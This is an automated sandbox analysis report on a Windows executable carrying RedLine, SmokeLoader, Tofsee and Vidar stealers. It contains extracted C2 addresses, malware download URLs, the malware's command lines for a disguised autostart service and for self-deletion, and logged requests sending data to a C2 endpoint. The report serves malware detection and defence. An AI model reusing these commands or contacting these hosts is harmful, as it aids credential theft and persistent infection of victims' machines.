Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4BfFNMA5mb.exe

Overview

General Information

Sample Name:4BfFNMA5mb.exe
Analysis ID:545822
MD5:ca9543de32176130dd7c0691abe93d66
SHA1:07ad8ba7432a6c1a92f63dba83ca1b64dca94184
SHA256:4f9f2d3789809c1f34877a5cd109aabeccea14c1cfe423ea271cc7cd0178b23a
Tags:ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

RedLine SmokeLoader Tofsee Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Changes security center settings (notifications, updates, antivirus, firewall)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Del in CommandLine
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE file contains more sections than normal
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
AV process strings found (often used to terminate AV products)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 7060 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 4BfFNMA5mb.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\4BfFNMA5mb.exe" MD5: CA9543DE32176130DD7C0691ABE93D66)
    • 4BfFNMA5mb.exe (PID: 6504 cmdline: "C:\Users\user\Desktop\4BfFNMA5mb.exe" MD5: CA9543DE32176130DD7C0691ABE93D66)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 2AA1.exe (PID: 6408 cmdline: C:\Users\user\AppData\Local\Temp\2AA1.exe MD5: DB8D46063705007002080046966E53DB)
          • 2AA1.exe (PID: 6640 cmdline: C:\Users\user\AppData\Local\Temp\2AA1.exe MD5: DB8D46063705007002080046966E53DB)
        • E936.exe (PID: 5128 cmdline: C:\Users\user\AppData\Local\Temp\E936.exe MD5: BABD835D0FE9E63300B037A5AAAA4284)
          • cmd.exe (PID: 6236 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • timeout.exe (PID: 6020 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
        • F3F5.exe (PID: 3132 cmdline: C:\Users\user\AppData\Local\Temp\F3F5.exe MD5: F59114142455D258FBFB4E2CF807A8F0)
          • cmd.exe (PID: 5504 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\lxijggxd\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6592 cmdline: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 4424 cmdline: C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 6232 cmdline: C:\Windows\SysWOW64\sc.exe" description lxijggxd "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 3376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • A3D.exe (PID: 3876 cmdline: C:\Users\user\AppData\Local\Temp\A3D.exe MD5: CCBCF301B4A4C51FC6AC6108E1A0A702)
          • A3D.exe (PID: 5656 cmdline: C:\Users\user\AppData\Local\Temp\A3D.exe MD5: CCBCF301B4A4C51FC6AC6108E1A0A702)
  • svchost.exe (PID: 7128 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3192 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 400 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4784 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 3176 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 6392 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1840 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 4820 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1952 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • jutawrs (PID: 6880 cmdline: C:\Users\user\AppData\Roaming\jutawrs MD5: CA9543DE32176130DD7C0691ABE93D66)
    • jutawrs (PID: 6684 cmdline: C:\Users\user\AppData\Roaming\jutawrs MD5: CA9543DE32176130DD7C0691ABE93D66)
  • svchost.exe (PID: 6500 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Tofsee

{"C2 list": ["pa:443", "parubey.info:443"]}

Threatname: RedLine

{"C2 url": "86.107.197.138:38133"}

Threatname: SmokeLoader

{"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}

Threatname: Vidar

{"C2 url": "http://file-file-host4.com/tratata.php"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BC9C.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000027.00000000.470989961.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000001A.00000002.484836901.0000000000400000.00000040.00020000.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
          00000027.00000000.469887932.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            0000001A.00000003.442910237.0000000000BE0000.00000004.00000001.sdmpJoeSecurity_TofseeYara detected TofseeJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              26.2.F3F5.exe.400000.0.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                26.2.F3F5.exe.bc0e50.1.raw.unpackJoeSecurity_TofseeYara detected TofseeJoe Security
                  27.2.A3D.exe.3bdfda0.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    39.0.A3D.exe.400000.12.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      39.0.A3D.exe.400000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 6 entries

                        Sigma Overview

                        System Summary:

                        barindex
                        Sigma detected: Copying Sensitive Files with Credential DataShow sources
                        Source: Process startedAuthor: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community: Data: Command: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\, CommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\F3F5.exe, ParentImage: C:\Users\user\AppData\Local\Temp\F3F5.exe, ParentProcessId: 3132, ProcessCommandLine: "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\almerphs.exe" C:\Windows\SysWOW64\lxijggxd\, ProcessId: 6592
                        Sigma detected: Suspicious Del in CommandLineShow sources
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E936.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E936.exe, ParentProcessId: 5128, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\E936.exe" & exit, ProcessId: 6236
                        Sigma detected: New Service CreationShow sources
                        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\F3F5.exe, ParentImage: C:\Users\user\AppData\Local\Temp\F3F5.exe, ParentProcessId: 3132, ProcessCommandLine: C:\Windows\SysWOW64\sc.exe" create lxijggxd binPath= "C:\Windows\SysWOW64\lxijggxd\almerphs.exe /d\"C:\Users\user\AppData\Local\Temp\F3F5.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4424

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Antivirus detection for URL or domainShow sources
                        Source: http://185.7.214.171:8080/6.phpURL Reputation: Label: malware
                        Source: http://91.243.44.128/stlr/maps.exeAvira URL Cloud: Label: malware
                        Source: http://unicupload.top/install5.exeURL Reputation: Label: phishing
                        Antivirus detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\B24B.exeAvira: detection malicious, Label: TR/Crypt.ASPM.Gen
                        Found malware configurationShow sources
                        Source: 00000006.00000002.347406740.0000000000680000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-data-coin-11.com/", "http://file-coin-host-12.com/"]}
                        Source: 0000001B.00000002.482088849.0000000003AC1000.00000004.00000001.sdmpMalware Configuration Extractor: RedLine {"C2 url": "86.107.197.138:38133"}
                        Source: 26.2.F3F5.exe.bc0e50.1.raw.unpackMalware Configuration Extractor: Tofsee {"C2 list": ["pa:443", "parubey.info:443"]}
                        Source: 25.2.E936.exe.5c0e50.1.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://file-file-host4.com/tratata.php"}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: 4BfFNMA5mb.exeVirustotal: Detection: 36%Perma Link
                        Source: 4BfFNMA5mb.exeReversingLabs: Detection: 53%
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: file-file-host4.comVirustotal: Detection: 15%Perma Link
                        Multi AV Scanner detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Temp\6BE6.exeReversingLabs: Detection: 44%
                        Source: C:\Users\user\AppData\Local\Temp\7D3D.exeReversingLabs: Detection: 27%
                        Source: C:\Users\user\AppData\Local\Temp\9904.exeReversingLabs: Detection: 39%
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeReversingLabs: Detection: 60%
                        Machine Learning detection for sampleShow sources
                        Source: 4BfFNMA5mb.exeJoe Sandbox ML: detected
                        Machine Learning detection for dropped fileShow sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\8992.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\9904.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\jutawrsJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\2AA1.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\6BE6.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\A3D.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\almerphs.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\B24B.exeJoe Sandbox ML: detected
                        Source: 25.3.E936.exe.5e0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 25.2.E936.exe.5c0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 26.2.F3F5.exe.400000.0.unpackAvira: Label: BDS/Backdoor.Gen
                        Source: 26.2.F3F5.exe.bc0e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: 26.3.F3F5.exe.be0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00407190 CryptUnprotectData,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

                        Compliance:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeUnpacked PE file: 25.2.E936.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\F3F5.exeUnpacked PE file: 26.2.F3F5.exe.400000.0.unpack
                        Source: 4BfFNMA5mb.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49819 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49850 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49854 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.216.132.51:443 -> 192.168.2.3:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49861 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.217.141.225:443 -> 192.168.2.3:49862 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49865 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49868 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 155.248.231.246:443 -> 192.168.2.3:49874 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49877 version: TLS 1.2
                        Source: Binary string: C:\Users\Administrator\Desktop\SystemInjectSvHostAllocation - Copy.pdb source: A847.exe.10.dr
                        Source: Binary string: C:\dixujupufakeka\dopuvo\hujom\vex.pdb source: 9904.exe.10.dr
                        Source: Binary string: ,C:\rolodevimigez\21\hiyilayiv\fijajifare23.pdb source: F3F5.exe.10.dr, almerphs.exe.26.dr
                        Source: Binary string: _tcC:\mefalizor\60\zorukuxibu\naritukeyipis\cudoyiyojil82 xero.pdb source: E936.exe, 00000019.00000000.426131563.0000000000401000.00000020.00020000.sdmp, E936.exe.10.dr
                        Source: Binary string: ,C:\tezosifoca-wugehesigije\navilemezu\cideno\xada\doj\bifehu.pdb source: 2AA1.exe, 0000000F.00000000.384214228.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 0000000F.00000002.394917452.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 00000013.00000000.390990579.0000000000401000.00000020.00020000.sdmp, 2AA1.exe.10.dr
                        Source: Binary string: C:\mefalizor\60\zorukuxibu\naritukeyipis\cudoyiyojil82 xero.pdb source: E936.exe, 00000019.00000000.426131563.0000000000401000.00000020.00020000.sdmp, E936.exe.10.dr
                        Source: Binary string: C:\zoci\kiz\ponecun6\camokixuki1\janel.pdb source: 6BE6.exe.10.dr
                        Source: Binary string: C:\tezosifoca-wugehesigije\navilemezu\cideno\xada\doj\bifehu.pdb source: 2AA1.exe, 2AA1.exe, 0000000F.00000000.384214228.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 0000000F.00000002.394917452.0000000000401000.00000020.00020000.sdmp, 2AA1.exe, 00000013.00000000.390990579.0000000000401000.00000020.00020000.sdmp, 2AA1.exe.10.dr
                        Source: Binary string: C:\kuxiv32_sicag\zamev cukohezo-baruledece_hopigije.pdb source: 4BfFNMA5mb.exe, jutawrs.10.dr
                        Source: Binary string: EC:\dixujupufakeka\dopuvo\hujom\vex.pdb source: 9904.exe.10.dr
                        Source: Binary string: C:\rolodevimigez\21\hiyilayiv\fijajifare23.pdb source: F3F5.exe.10.dr, almerphs.exe.26.dr
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                        Source: C:\Users\user\AppData\Local\Temp\E936.exeCode function: 25_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49871 -> 116.202.188.27:80
                        Source: TrafficSnort IDS: 2022482 ET TROJAN JS/Nemucod requesting EXE payload 2016-02-01 192.168.2.3:49884 -> 141.8.192.151:80
                        Source: TrafficSnort IDS: 2021954 ET TROJAN JS/Nemucod.M.gen downloading EXE payload 141.8.192.151:80 -> 192.168.2.3:49884
                        System process connects to network (likely due to code injection or exploit)Show sources
                        Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                        Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                        Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                        Source: C:\Windows\explorer.exeDomain query: downloafilesaccess.ddns.net
                        Source: C:\Windows\explorer.exeDomain query: unicupload.top
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.233.81.115 187
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.7.214.171 144
                        Source: C:\Windows\explorer.exeDomain query: host-data-coin-11.com
                        Source: C:\Windows\explorer.exeDomain query: infinity-cheats.com
                        Source: C:\Windows\explorer.exeDomain query: transfer.sh
                        Source: C:\Windows\explorer.exeNetwork Connect: 185.186.142.166 80
                        Source: C:\Windows\explorer.exeDomain query: privacytools-foryou-777.com
                        Source: C:\Windows\explorer.exeDomain query: data-host-coin-8.com
                        Uses dynamic DNS servicesShow sources
                        Source: unknownDNS query: name: downloafilesaccess.ddns.net
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: pa:443
                        Source: Malware configuration extractorURLs: parubey.info:443
                        Source: Malware configuration extractorURLs: http://host-data-coin-11.com/
                        Source: Malware configuration extractorURLs: http://file-coin-host-12.com/
                        Source: Malware configuration extractorURLs: http://file-file-host4.com/tratata.php
                        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: global trafficHTTP traffic detected: GET /trustedrootdev/file/downloads/SystemInjectSvHostAllocation.jpeg HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /georgindesign/desingner/downloads/Update.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /georgindesign/desingner/downloads/Updater.exe HTTP/1.1Host: bitbucket.org
                        Source: global trafficHTTP traffic detected: GET /tratata.php HTTP/1.1Host: file-file-host4.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqlite3.dll HTTP/1.1Host: file-file-host4.comCache-Control: no-cacheCookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv
                        Source: global trafficHTTP traffic detected: POST /tratata.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EKNYUKXBA1NYU3OPHost: file-file-host4.comContent-Length: 104397Connection: Keep-AliveCache-Control: no-cacheCookie: PHPSESSID=n6c9ok5pr9f3mq8uid55nirqfv
